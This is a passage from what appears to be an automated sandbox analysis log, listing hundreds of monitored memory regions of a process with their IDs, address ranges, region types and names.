0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7334 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7336 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7337 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7338 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7340 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7341 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7342 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7346 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7348 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7349 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7350 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7352 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7353 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7354 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7356 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7357 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7358 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7359 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7360 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7361 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7362 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7363 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7364 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7365 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7366 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7367 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7370 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7371 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7372 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7373 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7374 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7375 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7376 start_va = 0x10250000 end_va = 0x102cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010250000" filename = "" Region: id = 7377 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7378 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7379 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 7380 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7383 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7384 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7387 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7388 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7390 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7391 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7392 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7394 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7395 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7396 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7397 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7398 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7399 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7400 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7401 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7402 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7403 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7404 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7405 start_va = 0x6c0000 end_va = 0x6ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7406 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7407 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7408 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7409 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7410 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7411 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7412 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7413 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7414 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7415 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7418 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7419 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7421 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7422 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7423 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7425 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7428 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7429 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7430 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7431 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7432 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7433 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7434 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7435 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7436 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7437 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7438 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7439 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7440 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7441 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7442 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7443 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7444 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7445 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7446 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7447 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7448 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7449 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7450 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7451 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7452 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7453 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7454 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7455 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7456 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7457 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7458 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7459 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7460 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7461 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7462 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7463 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7464 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7465 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7466 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7467 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7468 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7469 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7470 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7471 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7472 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7473 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7474 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7475 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7476 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7477 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7478 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7479 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7480 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7481 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7482 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7483 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7484 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7485 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7486 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7487 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7488 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7489 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7490 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7491 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7492 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7494 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7495 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7496 start_va = 0x7c60000 end_va = 0x7d59fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 7497 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7498 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7499 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7500 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7501 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7502 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7503 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7504 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7505 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7506 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7507 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7508 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7509 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7510 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7511 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7512 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7513 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7514 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7515 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7516 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7517 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7518 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7519 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7520 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7521 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7522 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7523 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7524 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7527 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7528 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7529 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7530 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7532 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7533 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7534 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7535 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7537 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7538 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7539 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7540 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7541 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7542 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7543 start_va = 